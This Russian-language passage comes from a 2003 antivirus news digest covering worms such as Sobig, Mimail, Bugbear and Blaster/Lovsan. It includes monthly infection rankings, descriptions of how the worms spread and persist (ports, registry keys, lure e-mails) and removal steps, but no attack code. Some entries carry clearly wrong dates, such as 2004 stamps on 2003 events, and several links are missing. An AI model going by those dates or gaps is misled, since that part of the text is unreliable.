19. I-Worm.Sobig - 0,32%
20. VBS.Redlof - 0,31%
На долю других вредоносных программ пришлось более половины всех заражений - 53,35%.


14 мая 2003 года В сети обнаружена активность червя Kickin, который написан на Microsoft Visual C 6.00. Эта зараза очищает память компьютера от ряда процессов (связанных с антивирусными и иными программами для обеспечения информационной безопасности) и прерывает те из них, которые активны на данный момент.

Червь Kickin распространяется по электронной почте, используя свой собственный SMTP механизм, а также по каналам IRC и через P2P приложения. W32/Kickin заражает системы Win9x, NT, 2000 и XP. Сообщения W32/Kickin пытаются обмануть пользователей, заставляя их думать, что зараженные файлы на самом деле связаны с атипичной пневмонией, модулями обновлений, любовными письмами, играми, фотографиями и т.п. W32/Kickin создает файл script.ini, содержащий код червя и позволяющий ему распространяться посредством mIRC. Также он копирует себя в общие папки P2P программ (KaZaA, Bearhsare, Edonkey2000 и Morpheus)


20 мая 2003 года  "Лаборатория Касперского" сообщает о появлении нового сетевого червя Palyh, который маскируется под сообщение от службы технической поддержки Microsoft. Распространяется вирус посредством электронной почты и через локальные сети и на данный момент уже зарегистрировано большое количество случаев заражения. При установке Palyh копирует себя под именем "MSCCN32.EXE" в каталог Windows и регистрирует этот файл в ключе автозапуска системного реестра. Таким образом, червь обеспечивает свою загрузку в память компьютера при запуске операционной системы.

После этого червь начинает процедуры распространения. Для рассылки по электронной почте он сканирует файлы с расширениями .TXT, .EML, .HTML, .HTM, .DBX, .WAB и выделяет из них строки, похожие на электронные адреса. Затем Palyh в обход установленной почтовой программы подключается к используемому SMTP-серверу и рассылает через него на эти адреса свои копии.

В качестве обратного адреса зараженное письмо использует адрес [email protected], что и вводит в заблуждение некоторых неопытных или просто по жизни безалаберных пользователей. Разумеется, что к этому письму Microsoft никакого отношения не имеет, поскольку рассылкой патчей не занимается вообще.


9.08.2003 Вирус Mimail: из России с любовью
По Сети распространяется новый червь под кодовым названием Mimail, сообщили сегодня представители «Лаборатории Касперского». Круглосуточная служба технической поддержки компании уже получила сообщения о многочисленных случаях заражения данной вредоносной программой. С определенной степенью уверенности можно говорить, что Mimail - дело рук российских вирусописателей, утверждают в «Лаборатории Касперского». Червь использует технологии и реализацию, практически идентичные примененным в троянской программе StartPage, которая однозначно имеет российское происхождение.
Mimail является интернет-червем, распространяющимся во вложенных файлах электронных писем. Зараженные письма содержат фальсифицированный адрес отправителя (что затрудняет поиск источника заражения) и выглядят следующим образом:
Тема: your account [rnd]
(где [rnd] - переменная величина, принимающая любые значения)
Текст:
Hello there,
I would like to inform you about important information regarding your email address. This email address will be expiring.
Please read attachment for details.
---
Best regards, Administrator
---
Вложенный файл: message.zip
Подобно нашумевшим червям Klez и Lentin (Yaha), Mimail проникает на компьютеры, используя “дыры” в системе безопасности браузера Internet Explorer. Во вложенном архиве MESSAGE.ZIP содержится файл MESSAGE.HTML. В случае, если пользователь имел неосторожность открыть его, встроенный Java-скрипт через брешь Exploit.SelfExecHTML незаметно записывает на диск и запускает файл-носитель червя FOO.EXE. В свою очередь, он копирует себя в директорию Windows под именем VIDEODRV.EXE и регистрирует этот файл в секции автозапуска системного реестра Windows для обеспечения запуска червя при каждой загрузке операционной системы. Mimail также создает ряд дополнительных файлов в директории Windows: EXE.TMP - червь в файле формате HTML; ZIP.TMP - червь в ZIP-архиве.
Для дальнейшего распространения по почте Mimail сканирует отдельные директории на локальном диске и извлекает из них строки, содержащие электронные адреса. Собранные данные записываются в файл EML.TMP в директории Windows, после чего червь, используя прямое подключение к почтовому серверу, незаметно рассылает по обнаруженным адресам свои копии.
Брешь Exploit.SelfExecHTML была обнаружена еще в марте 2002 г., и компания Microsoft еще тогда выпустила специальное обновление для Internet Explorer.Mimail, по большому счету, безобидная программа с точки зрения побочных эффектов. Ее опасность заключается в популяризации описанной бреши Internet Explorer.


15.11.2004         За 24 часа Fizzer поразил 17, 765 компьютеров.
Новый компьютерный червь Fizzer (мы сообщали о его появлении вчера), который распространяется не только через электронную почту, но и посредством пиринговых сетей уже поразил десятки тысяч компьютеров в странах Азии, Европы и в США. Бизнесмены азиатских стран первыми забили тревогу о появлении нового вируса,. cообщает Reuters. К полудню того же дня вирус уже добрался до европейских пользователей поразив десятки тысяч компьютерных систем. В Северной Америке вирус еще не успел получить широкое распространение, поскольку его проникновение в регион пришлось на конец рабочего дня. Британская анти- вирусная компания MessageLabs зарегистрировала в течении 24 часов 17, 765 случаев заражения вирусом Fizzer. «Быстрые темпы распространения червя заставляют нас отнести его к группе вирусов, предстовляющих высоких риск для обычных пользователей, - рассказал в интервью Reuters Макр Тошак, один из аналитиков MessageLabs.


Двадцатка вирей за май.
"Лаборатория Касперского" опубликовала двадцатку вредоносных программ, получивших в мае наибольшее распространение. Вирус Klez, не один месяц прочно державшийся на первом месте, на этот раз скатился на третье. Первую же строчку, по статистике антивирусной компании, занимает вирус I-Worm.Sobig. На его долю приходится 21,87% зафиксированных заражений, и отрыв от ближайшего конкурента составляет почти 6 процентов.
I-Worm.Sobig - 21,87%
I-Worm.Lentin - 15,95%
I-Worm.Klez - 15,39%
I-Worm.Fizzer - 0,67%
I-Worm.Roron - 0,51%
Worm.Win32.Randon - 0,38%
I-Worm.Ganda - 0,28%
Macro.Word97.Thus - 0,28%
Backdoor.Assasin - 0,24%
I-Worm.Tanatos - 0,21%
Backdoor.Optix - 0,20%
Backdoor.IRC.Zcrew - 0,19%
Win32.Parite - 0,17%
Win32.FunLove - 0,17%
Backdoor.IRC.Flood - 0,16%
TrojanDropper.JS.Mimail - 0,16%
VBS.Redlof - 0,15%
Backdoor.IRC.mIRC-based - 0,14%
Backdoor.SdBot.gen - 0,12%
TrojanDownloader.Win32.Swizzor - 0,12%

Вирусная десятка мая в версии Panda Software
По итогам проверок, проводимых по всему миру бесплатным онлайновым антивирусом Panda ActiveScan, в мае червь Klez.I по-прежнему возглавлял вирусную десятку и стал причиной более 8 % зафиксированных заражений. Сразу за ним следует Enerkaz - он был обнаружен более чем в 4% случаев. Другими вирусами, чаще других атакующими компьютеры пользователей в мае, стали червь Parite.B (около 4%) и троянец NoClose (более 3 %). Недавно появившийся червь Sobig.B находится на пятом месте. Несмотря на свою молодость, это червь стал причиной большого количества вирусных инцидентов - на его совести около 3 % вирусных атак мая.

Вторая половина вирусной десятки - старые знакомцы, уже несколько месяцев отказывающиеся покидать места в первой десятке - Elkern.C, Opaserv, Nimda, Bugbear и Redlof.A.

Таким образом, два момента обращают на себя внимание: во-первых, в мае Klez.I сохранял свои позиции, что может быть объяснено исключительным по своим возможностям методом распространения, и, во-вторых, очень эффектный старт червя Sobig.B. Тот факт, что наиболее активные вирусы мая появились на сцене несколько месяцев назад, подтверждает мысль о необходимости более ответственного подхода к антивирусной защите компьютера. Луис Корронс (Luis Corrons), глава Вирусной Лаборатории Panda Software, утверждает: "Для того, чтобы быть полностью защищенными от вредоносных кодов, пользователи должны устанавливать антивирусную программу с обязательными ежедневными обновлениями. В противном случае,вероятность быть зараженным чрезвычайно высока. И речь не только о самых свежих вирусах, но и о тысячах других вредоносных кодов, циркулирующих по сети в настоящее время".


04 июня 2003 года

Скорость, с которой червь Sobig.C распространяется по миру, позволяет говорить о возможном начале новой эпидемии. Действительно, Sobig.C уже сейчас входит в десятку наиболее распространенных вирусов, которая составляется по итогам работы бесплатного онлайнового антивируса Panda ActiveScan.

Причем, следует отметить, что Sobig.C расширяет географию своего распространения. Согласно данным, поступающим в Службу международной технической поддержки, инциденты с этим червем зафиксированы в Канаде, Испании, Великобритании и США. В качестве средств распространения Sobig.C использует электронную почту и локальные сети. Письмо с этим червем легко распознать, поскольку оно всегда содержит текст 'Please see the attached file'. Название прикрепленного файла может варьироваться.

Заразив компьютер, Sobig.C рассылает себя по всем адресам электронной почты, которые он находит в файлах с расширениями .txt, .eml, .htm, .html, .dbx и .wab. Panda Software советует всем пользователям быть предельно внимательными при получении почты, а также немедленно обновить свои антивирусные программы тем, у кого они не настроены на автоматическое обновление.

В связи c увеличивающейся угрозой заражения этим червем компания Panda Software выпустила бесплатную утилиту PQRemove, которая поможет пользователям, успевшим пострадать от этого червя, вылечить свои системы.


06/06/2003 За 1,5 часа вирус Bugbear B заразил 25000 компьютеров по всему миру
В 2002 году вирус Bugbear был одним из самых опасных вирусов. Новый вариант вируса Bugbear B, содержит множество мелких программ, которые помогают вирусу распространяться, похищать конфиденциальную информацию, прятаться и отключать программы следящие за безопасностью. Инфицирование происходит через электронную почту. В теме сообщения, содержащего вирус, может присутствовать следующий текст:

  • Greets!
  • Your Gift
  • Your News Alert
  • free shipping!
  • Membership Confirmation
  • update
  • history screen
  • bad news
  • I need help about script!!!
  • Stats

Что бы придать себе правдоподобие вирус использует одно из названий документов содержащихся на компьютере-источнике, однако у файла присутствует двойное расширение, например «имя файла».doc.exe, что позволяет его легко идентифицировать опытному пользователю. Когда вирус проникает в компьютер, он ищет адреса для рассылки, а также случайным образом подбирает адрес, который будут указан в сообщении как адрес отправителя "from".
Вирус самостоятельно копируется на жесткие диски и в папки, находящиеся в свободном доступе в сетевом окружении. Иногда это приводит к тому, что сетевой принтер печатает страницу за страницей абракадабры.
Bugbear B также пытается установить программу, фиксирующую все нажатия на клавиатуре компьютера. Это позволяет отслеживать все набираемые тексты и в том числе вводимые пароли. В определенный момент, вирус открывает «черный ход» в Интернет так, что бы создатель вируса получил контроль над зараженным компьютером. Замечено, что путешествуя от компьютера к компьютеру вирус может трансформироваться, что бы избежать обнаружения антивирусными программами по свойственным ему подписям или участкам кода.


10 июня 2003 года   В сети обнаружена новая модификация червя I-Worm.Tanatos.b в диком виде. Червь не сильно отличается от своего предшественника по функциональным возможностям. Фактически он представляет собой шифрованный и слегка модифицированный вариант предыдущей версии: I-Worm.Tanatos. Червь распространяется по электронной почте в виде прикреплённых к письмам файлов.

Письмо также содержит HTML-страницу, содержащую скрипт, автоматически активизирующий тело червя при просмотре письма через уязвимость IFRAME. При запуске червь делает свою копию в папку автозапуска программ и в папку Windows. Далее он ищет адреса электронной почты, перебирая файлы, подходящие под маски: *.ods, .inbox*, *.mmf, *.nch, *.mbx, *.eml, *.tbb, *.dbx.

Правда, при отправке инфицированных писем червь иногда совершает ошибку, из-за чего конечному пользователю приходит повреждённое тело червя, которое не может нанести вреда.


17 Июнь 2003  Новый разрушительный вирус/червь Trile
Вирусная Лаборатория компании Panda Software обнаружила появление нового червя Trile (W32/Trile). Этот вредоносный код способен заражать файлы, а также использовать методы «социального инжиниринга» для широкого распространения. Trile попадает на компьютеры в электронном сообщении с варьирующимися параметрами, выбирая тему, текст сообщения и т.п. из имеющегося списка. Вложения всегда имеют двойное расширение, одним из которых является .bat или .pif, а другим может быть одно из следующих: .gif, .mpg, .mp3, .xls, .wav, .dat, .jpg, .htm, .txt, .mdb, .bmp или .doc. При открытии такого файла Trile рассылает себя по всем адресам из Адресной книги Outlook. Кроме того, он создает папку “C:/My Downloads”, если таковой не существует. В этой папке червь создает большое количество своих копий с завлекательными именами, такими как: Civilization 3 Full Downloader.exe, Need For Speed 5 Porsche Unleashed Patch.exe или Star Wars Starfighter ISO - Full Downloader.exe. Кроме того, Trile заражает файлы с расширением .EXE. Наконец, он создает ряд записей в Реестре Windows, имеющих отношение к действиям червя на зараженном компьютере, например, сколько сообщений он разослал.


04.07.2003       Рейтинг распространения вирусов в июне

"Лаборатория Касперского" опубликовала очередной ежемесячный отчёт, отражающий текущую динамику попыток заражений тем или иным видом вирусных программ.

                                                    Рейтинг распространения вирусов в июне 2003 г.

 Поз.  Название  Доля
 1  I-Worm.Lentin  32.48%
 2  I-Worm.Klez  17.69%
 3  I-Worm.Tanatos  16.91%
 4  I-Worm.Sobig  12.01%
 5  Macro.Word97.Saver  1.17%
 6  Macro.Word97.Thus  1.00%
 7  VBS.Redlof  0.73%
 8  I-Worm.Ganda  0.53%
 9  Backdoor.Beastdoor  0.31%
 10  Win95.CIH  0.29%
 11  Backdoor.Assasin  0.28%
 12  Backdoor.Optix  0.22%
 13  Backdoor.SdBot.gen  0.21%
 14  I-Worm Hybris  0.20%
 15  Win32.Parite  0.20%
 16  I-Worm.Avron  0.20%
 17  I-Worm Hawawi  0.15%
 18  Backdoor.Death  0.15%
 19  I-Worm.Mapson  0.14%
 20  Backdoor.IRC.Zcrew  0.14%
   Остальные  53.35%

Как видим, резко подскочила степень заражения вирусом I-Worm.Tanatos (третье место в списке), а вот прошлый лидер - I-Worm.Sobig - оказался на четвёртой позиции. Всего первые четыре вируса привели к почти 80% атак из числа первых двадцати вирусов (или к почти 37% всех зарегистрированных заражений)!


19 Июль 2003 Итоги вирусной активности за первую половину 2003 года
Комапания Panda Software подвела итоги вирусной активности первой половины 2003г. Первое полугодие 2003 года можно охарактеризовать как переходный период: наблюдаемый процесс эволюции компьютерных вирусов показывает направление их дальнейшего развития. Первое важное событие этого полугодия – появление вируса SQL Slammer. Он представляет собой новое поколение вредоносных кодов, распространяющихся непосредственно в сети Интернет и использующих дыры в программном обеспечении (в данном случае в SQL серверах). Следует признать, что SQL Slammer изрядно потрепал нервы пользователям из-за большого количества пораженных им серверов. Список вирусов, наиболее часто обнаруживаемых бесплатным онлайновым антивирусом Panda ActiveScan, в течение первых пяти месяцев возглавлял почтовый червь Klez.I. В начале июня на сцене появляется червь/троян Bugbear.B, который выбил из седла Klez.I. и занял место лидера. Эпидемия Bugbear.B позволяет говорить о другой тенденции: хотя в центре внимания по-прежнему остаются почтовые черви, использующие методы социального инжиниринга и дыры в программном обеспечении, значительную долю в общем числе заражений теперь составляют вирусы нового типа – гибриды червя и трояна. Вирусы нового типа, как следует из названия, объединяют в себе характеристики обоих типов вредоносных кодов, благодаря чему становятся вдвойне опаснее каждой из названных групп по отдельности. В частности, от троянов им досталась способность открывать доступ к компьютеру пользователя или воровать конфиденциальную информацию, например, базы данных клиентов, номера банковских счетов, кредитных карточек и т.д.


17.07.2003                       Опасный вирус маскируется под обновление для Windows
Компания Symantec предупреждает о появлении крайне опасного червя W32.Gruel@mm. Ситуацию спасает только то, что он пока мало распространен. Червь распространяется по электронной почте и в пиринговой сети Kazaa. В первом случае он маскируется под критическое обновление для ОС Windows, а во втором - под генератор ключей для WinXP. На деле же при запуске происходит совсем иное: червь удаляет системные файлы Windows, обеспечивает свой запуск при запуске других программ, а также демонстрирует фальшивое сообщение об ошибке, при попытке закрыть которое открывается множество окон панели управления, исчезает панель задач, скрывается значок диска С:, и выполняются другие малоприятные  действия.


22 июля 2003 года                                     Klys
Компания Panda Software предупреждает о появлении нового червя Klys. Он распространяется через чаты IRC, сетевые папки и диски. После активации червь отключает доступ к большинству совместно использующихся сетевых ресурсов и открывает ряд портов, через которые на компьютер может проникнуть хакер. Помимо этого, Klys заносит на компьютеры другого червя под названием Cult. Klys устанавливается в систему в виде нескольких файлов, каждый из которых выполняет собственные функции. Для обеспечения своего запуска при старте Windows червь модифицирует системный реестр.


30 июля 2003 года   В сети обнаружены E и F варианты червя Gruel, которые распространяются по электронной почте и в программе обмена файлами KaZaA. Оба червя чрезвычайно опасны, поскольку удаляют файлы, необходимые для нормальной работы Windows (AUTOEXEC.BAT, CONFIG.SYS и др.). В процессе работы эти программы открывают несколько окон Панели управления, открывают и закрывают лоток устройства для чтения компакт-дисков, отключают Панель задач, скрывают содержимое диска C: таким образом, что поиск файлов становится невозможным и др.
После заражения компьютера черви выводят на экран монитора ложные сообщения об ошибках Windows. Создают записи в реестре Windows с различными ключами (в зависимости от того, был ли перезагружен компьютер или нет). Таким образом, Gruel.E и Gruel.F обеспечивают себе запуск при каждой загрузке файлов с расширением exe, com, bat, pif или файлов программы HyperTerminal.
Основное отличие между ними заключается в том, что они распространяются в файлах-вложениях с различными именами. К письму, зараженному червем Gruel.E, прикреплен файл OFFICEXPTRIAL.EXE, а у Gruel.F этот файл называется PROTECT_REMOVE_TOOL.EXE.


31.07.2003                                   Lorsis
Компания Symantec предупреждает о появлении нового деструктивного червя W32.Lorsis.Worm. Он распространяется через файлобменную сеть Kazaa, маскируясь под утилиты для взлома популярных программ или порноклипы. Файл с вирусом имеет фальшивое расширение (.zip, .avi, .jpg или .doc), после которого идут несколько пробелов и настоящее расширение - .exe. После запуска червь копирует себя в общие для пользователей Kazaa папки, стирает редактор реестра и утилиту MSConfig.exe, обеспечивает свой автозапуск. Если системная дата находится в интервале с 6 по 31 декабря, червь создает и запускает командный файл, в котором содержатся команды на удаление системных файлов в папках C:\Windows, C:\Windows\System и C:\Windows\System32.


1.08.2003                                   VBS.Bingd@mm
Компания Symantec предупреждает о появлении в интернете нового почтового червя, названного VBS.Bingd@mm. В "Лаборатории Касперского" эту же программу называют Trojan.VBS.NoExp, а по классификации McAfee она называется VBS/Generic@MM. Червь написан на Visual Basic, а страной его происхождения является, скорее всего, Китай. Во всяком случае, тема и основной текст письма с вирусом написаны на китайском языке. При запуске вложенного в письмо файла активируется червь. Он рассылает себя по семи первым адресам из книги Outlook Express и модифицирует реестр, отключая ряд элементов интерфейса оболочки Windows и Internet Explorer. Отключаются, в частности, контекстные меню.
Насколько опасен вирус для российских пользователей, сказать сложно. С одной стороны, вряд ли письмо на китайском заинтересует многих, но с другой, если в системе не установлена поддержка китайского зыка, текст письма отобразится в виде абракадабры. В этом случае пользователь может предположить наличие проблем с кодировками и открыть зараженный вложенный файл.


dl // 12.08.03                              Приполз новый червяк
Proantivirus Lab сообщает о появлении нового опасного и быстро распространяющегося (в том числе и по России) червя, использующего недавно открытую дырку в RPC во всех ОС семейства NT. Заражение удаленное, через 135-й порт, исполняет команды из-под Local System.
Признаки заражения:
° Наличие файлов "MSBLAST.EXE", "TEEKIDS.EXE" или "PENIS32.EXE" в системном каталоге Windows (обычно WINDOWS\SYSTEM32\)
° Внезапная перезагрузка компьютера после соединения с Интернетом каждые несколько минут
° Многочисленные сбои в работе программ Word, Excel и Outlook
° Сообщения об ошибках, вызванных файлом "SVCHOST.EXE"
° Появление на экране окна с сообщением об ошибке (RPC Service Failing)
- Сообщение об ошибке (RPC service failing) приводящее к перезагрузке системы.
- Наличие в системном реестре ключа HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe I just want to say LOVE YOU SAN!! bill
Первую атаку новый компьютерный червь нанес 11 августа по компьютерным сетям США. За несколько часов работы червь побил все рекорды скорости распространения. В штатах он долго не задержался и стал лавинообразно распространяться дальше. Интернет-форумы тут и там пестрели сообщениями о том, что машины начинают самопроизвольно перезапускаться. В среду утром появилась информация о том, что новый вирус успел уже поразить 400 компаний по всему миру и около 20 тыс. персоналок. Что же это за зверь такой страшный?
За пару дней вирус успел приобрести несколько имен (W32/Lovsan.worm [McAfee], Win32.Poza [CA], Lovsan [F-Secure], WORM_MSBLAST.A [Trend], W32/Blaster-A [Sophos], W32/Blaster [Panda], W32.Blaster.Worm [Symantec Security]) и стал определяться всеми антивирусными программами. Для проникновения на компьютер Lovsan использует обнаруженную 16 июля хакерской группой Last Stage of Delerium уязвимость в системах Windows NT 4.0, Windows 2000, Windows XP и Windows 2003. Бреш была обнаружена в службе DCOM RPC. Distributed Component Object Model (распределенная компонентная объектная модель) - это модель обмена данными, служащая для совместной работы различных приложений. А RPC (Remote Procedure Call) - это служба, обеспечивающая соединение между клиентом и сервером, используемая архитектурой DCOM.

Незамедлительно после выхода в свет сообщения об уязвимости, всеми любимая корпорация подтвердила эту информацию и классифицировала дыру, как опасную. Через пять дней Microsoft уже выпустила в свет заплатки, закрывающие бреш. Все вроде хорошо, да вот только большинство пользователей не обратили внимания на это происшествие и никаких заплаток на свой компьютер не ставили.

В первых числах августа появился первый червь, проникающий в систему через вышеописанную бреш - Autorooter. Вирус имел слабое место - система распространения практически не реализована. Поэтому шум вокруг него затих, и должного внимания инциденту не уделили, а зря…

И вот, меньше чем через две недели появляется новый червь с прекрасно реализованной системой распространения. Для того чтобы заразиться новой болезнью, вам просто надо быть в интернете - вирус сам вас найдет. Происходит это так. Червь проверяет 135-й порт машин, висящих в инете. Если преград для внедрения в систему жертвы нет (Windows подходящий, заплатки не стоят), то червь начинает атаку. На порт 135 червь посылает запрос для предоставления полного доступа к атакуемому. Если все "хорошо", то на компьютере-жертве открывается порт 4444 для ожидания последующих команд. Одновременно червяк слушает порт 69 UDP на первоначально зараженном компьютере. Как только от новой жертвы к нему поступает TFTP-запрос, червь загружает на компьютер жертвы файл носителя MSBLAST.EXE размером 6175 байт. Файл записывается в системную папку Windows и запускается.

В системном реестре появляется следующая строка для запуска червя после перезагрузки системы: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "windows auto update" = msblast.exe В коде червя была обнаружен следующий текст: "Billy Gates why do you make this possible? Stop making money and fix your software!" (Билли Гейтс, почему ты допускаешь такое? Перестань делать деньги и исправь свое ПО!). и I just want to say LOVE YOU SAN!! Bill (Просто хочу сказать - любите свои системные сети).

Именно благодаря фразе "LOVE YOU SAN" червь получил одно из своих названий "lovsan". Некоторые отечественные СМИ букву "a" заменили на "u", видимо подумав, что название происхо-дит от слова "sun".

Для простого юзера главная опасность нового червя заключается в том, что он генерирует огромный объем избыточного трафика, переполняющего каналы передачи данных интернета. Побочным явлением нового вируса являются еще и постоянные перезагрузки компьютера с появляющейся ошибкой вида:

Перезагрузка компьютеров в планы злоумышленников, повидимому, не входила. Вирус не должен был никак себя проявлять до часа Х, а именно до 16 августа. На этот день намечена крупномасштабная DDoS атака всех копий червя на сайт windowsupdate.com, содержащий обновления Windows. Пакеты данных с зараженных компьютеров, бомбардируя сайт, сделают его недоступным. Но секрет раскрыт раньше времени. Похоже, теракт не удался. Массированная атака с помощью компьютеров-жертв - вот цель, которую преследовали и создатели предыдущего вируса Autorooter.

"Предупрежден - значит вооружен!" - так то оно так, да вот только предупреждены, как всегда, далеко не все. Позвонив свои знакомым, вы наверняка узнаете, что их компьютер постоянно перезагружается и в чем проблема - для них не ясно. Поэтому говорить о победе еще рано.

Итак: если ваш компьютер постоянно перезагружается; если в папке windows\system32 появился файл msblast.exe; если в реестре появилась вышеописанная надпись - вы тоже на крючке у нового червя. Но избавится от него очень просто - либо всю эту гадость и удалить самостоятельно, либо запустить специально выпущенную специалистами компании Symantec утилиту W32.Blaster.Worm Removal Tool, удаляющую из системы самого червя и устраняющую все последствия его жизнедеятельности. Никаких настроек - запустил и готово.

После удаления неплохо было бы поставить заплатку на Windows с сайта windowsupdate.com (пока он еще не умер :)) и с помощью межсетевого экрана заблокировать порты 135, 69 и 4444 (если, конечно, они не используются другими приложениями).

Мой компьютер исключением не стал. Все прелести нового червячка я успел попробовать на себе.Теперь нам остается ждать, правда, совсем не долго. Но даже если 16 августа ничего и не произойдет, то что-нибудь произойдет позже, с появлением нового червя. Черви были, есть и будут.

15.11.2004         Лаборатория Касперского" прогнозирует, что уже в ближайшие часы может начаться повторная глобальная эпидемия этой вредоносной программы, поскольку обе модификации "Lovesan" могут беспрепятственно существовать на одном и том же компьютере. "Иными словами, все компьютеры, зараженные оригинальной версией этого червя, скоро также будут атакованы его новой модификацией. Учитывая, что количество инфицированных систем сейчас достигает 300 тысяч, рецидив эпидемии будет означать по крайней мере удвоение этого числа, что повлечет за собой непредсказуемые последствия, - комментирует Евгений Касперский, руководитель антивирусных исследований "Лаборатории Касперского", - В худшем случае мировое сообщество ждет повторение ситуации января 2003 г., когда из-за червя "Slammer" значительно замедлилась работа интернета и наблюдались региональные отключения сети".
Технологически новая модификация "Lovesan" ничем не отличается от оригинала. Изменения коснулись только имени файла-носителя червя (TEEKIDS.EXE вместо MSBLAST.EXE), технологии его упаковки (утилита FSG вместо UPX) и текстовых строк внутри программного кода, которые содержат ненормативную оскорбительную лексику в адрес Microsoft и антивирусных компаний.

В полночь, 16 августа, заражённые вышеназванными вирусами компьютеры начали планомерно обращаться к адресу предполагаемого сервера Microsoft, на котором последняя хранит информацию о патчах и обновлениях. По плану злоумышленников, возросший трафик "забьёт" доступ к серверу тех пользователей, которые захотят скачать патч. Однако в одном моменте авторы вируса просчитались - "черви" были проинструктированы на вызов сайта, но на самом-то деле, истинный адрес выглядит так. Конечно, ссылка также была работоспособна - при её вызове проистекало автоматическое перенаправление на истинный адрес, вот только специалисты Microsoft, изучившие тело "червя", предусмотрительно отключили этот самый автоматический редирект. Реальный адрес сайта Windows Update - жив и здравствует, так что все желающие могут воспользоваться его услугами.
Кроме того, нелишне будет напомнить, что у Microsoft существует ещё такой сайт, как, на котором вы также можете найти необходимую информацию о "лазейках" в системе безопасности, вирусах, поражающих Windows и другие сведения по теме. Естественно, там существует, подробно освещающий текущую эпидемию и содержащий ответы на часто задаваемые вопросы, инструментарий для сканирования системы, ссылки на патчи, советы специалистов и прочую полезную информацию. В частности, на самом видном месте размещена информация о том, что в настоящее время под видом рассылки патчей (якобы защищающих вас от "червей" msblast, lovesan и пр.) злоумышленники по электронной почте рассылают вирусы от имени Microsoft...


20 Август 2003  Новая версия вируса Sobig

Пока весь мир следил за распространением вируса Blaster, вирусописатели не сидели сложа руки. Только что выловлена новая версия червя Sobig, впервые появившегося в интернете в начале года. Как сообщает антивирусная компания "Лаборатория Касперского", сообщения о случаях заражения данной вредоносной программой уже поступили из России и нескольких европейских стран.
Sobig.f практически ничем не отличается от своих предшественников. Косметические изменения коснулись лишь признаков рассылаемых писем (тема, текст, имена вложенных файлов) и даты деактивации. 10 сентября червь переходит в спящий режим и никак более не выдает своего присутствия на компьютере.
Sobig распространяется по электронной почте в виде вложенных файлов и по ресурсам локальной сети, создавая свои копии на открытых дисках. Для почтовой рассылки он сканирует файлы зараженного компьютера, находит в них адреса и незаметно посылает на них свои копии. Чтобы заставить пользователя запустить свой файл-носитель червь использует разнообразные методы социального инжиниринга, в частности, маскируясь под письма от технической поддержки Microsoft. Среди побочных действий "Sobig" необходимо отметить возможность загрузки и установки с удаленных web-серверов на зараженный компьютер обновленных версий червя или внедрять в систему программы-шпионы.

Как избавиться от вируса Sobig.F

Компания Network Associates сообщает способ обнаружения и нейтрализации вируса Sobig.F. О наличии вируса в системе свидетельствуют следующие симптомы:

  1. В системной папке Windows присутствует файл WINPPR32.EXE. Тот же файл упомянут в списке запущенных процессов системы.
  2. В реестре Windows присутствуют следующие строки:
    • HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "TrayX" = C:\WINNT\WINPPR32.EXE /sinc
    • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "TrayX" = C:\WINNT\WINPPR32.EXE /sinc


Чтобы избавиться от вируса, необходимо удалить с жесткого диска файлы вируса и стереть все записи вируса в реестре. Для этого в операционной системе Win9x/ME необходимо перезагрузиться в безопасный режим работы (Safe Mode) и удалить файлы WINPPR32.EXE и WINSTT32.DAT из системной папки Windows. В реестре необходимо удалить переменную TrayX из папок HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run и HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. В операционной системе WinNT/2K/XP перезагружаться в безопасный режим необязательно - достаточно в диспетчере задач удалить процесс WINPPR32.EXE.


21.08.03  Под маской "доброго" вируса скрывается вредитель
"Welchia" принадлежит к разряду вирусов, несущих определенную гуманитарную функцию. Они атакуют компьютер, проникают в систему, но не наносят какого-либо вреда. Наоборот, они удаляют другие вредоносные программы и иммунизируют компьютеры.
Также и в случае с "Welchia". Этот червь заражает компьютеры подобно "Lovesan": через бреши в системе безопасности. Однако, в отличие от него, "Welchia" атакует не только уязвимость в службе DCOM RPC, но также брешь WebDAV в системе IIS 5.0 (специальное программное обеспечение для управления web-серверами). Для проникновения на компьютеры червь сканирует интернет, находит жертву и проводит атаку по портам 135 (через брешь в DCOM RPC) и 80 (через брешь WebDAV). В ходе атаки он пересылает на компьютер свой файл-носитель, устанавливает его в системе под именем DLLHOST.EXE в подкаталоге WINS системного каталога Windows и создает сервис "WINS Client".
После этого "Welchia" начинает процедуру нейтрализации червя "Lovesan". Для этого он проверяет наличие в памяти процесса с именем "MSBLAST.EXE", принудительно прекращает его работу, а также удаляет с диска одноименный файл. Далее "Welchia" сканирует системный реестр Windows для проверки установленных обновлений. В случае, если обновление, закрывающее уязвимость в DCOM RPC не установлено, червь инициирует процедуру его загрузки с сайта Microsoft, запускает на выполнение и, после успешной установки, перегружает компьютер.
Мало того, в "Welchia" предусмотрена и возможность самоуничтожения, которая активируется если текущий год равен 2004.
Появление сетевого червя "Welchia" вызвало бурные дискуссии в интернет-сообществе. Главным вопросом обсуждения стало право на существование вредоносных программ, которые борются с себе подобными. К сожалению, многие пользователи заблуждаются относительно преимуществ и недостатков "Welchia".
Полезных вирусов не бывает, полагают специалисты "Лаборатории Касперского". Эти два понятия несовместимы. Побочные действия "Welchia" по удалению "Lovesan" и попытке обновления Windows - это верхушка айсберга, которая вводит пользователей в заблуждение. Настоящее значение этой вредоносной программы скрывается под водой и может остаться незамеченным.
Во-первых, "Welchia" совершает несанкционированный взлом компьютера, что однозначно классифицируется законодательными актами как преступление. Червь всячески скрывает свое присутствие в системе, а также атакует IIS-серверы, которых он оставляет уязвимыми.
Во-вторых, червь модифицирует зараженную систему и загружает на нее потенциально опасные объекты (модуль FTP-сервера, файл-носитель вредоносной программы). Это может привести к нарушению работы операционной системы и открывает злоумышленникам "лазейку" на компьютер. Например, с помощью FTP-сервера с зараженной системы можно украсть информацию.
В-третьих, "Welchia" создает поток вредоносных данных. Это дискредитирует владельца зараженного компьютера, требует оплаты дополнительного сетевого трафика, а также засоряет интернет-каналы. Последнее обстоятельство может спровоцировать глобальную интернет-катастрофу: при достаточно большом количестве инфицированных систем объем вирусного трафика перегружает каналы передачи данных и вызывает замедление Сети.
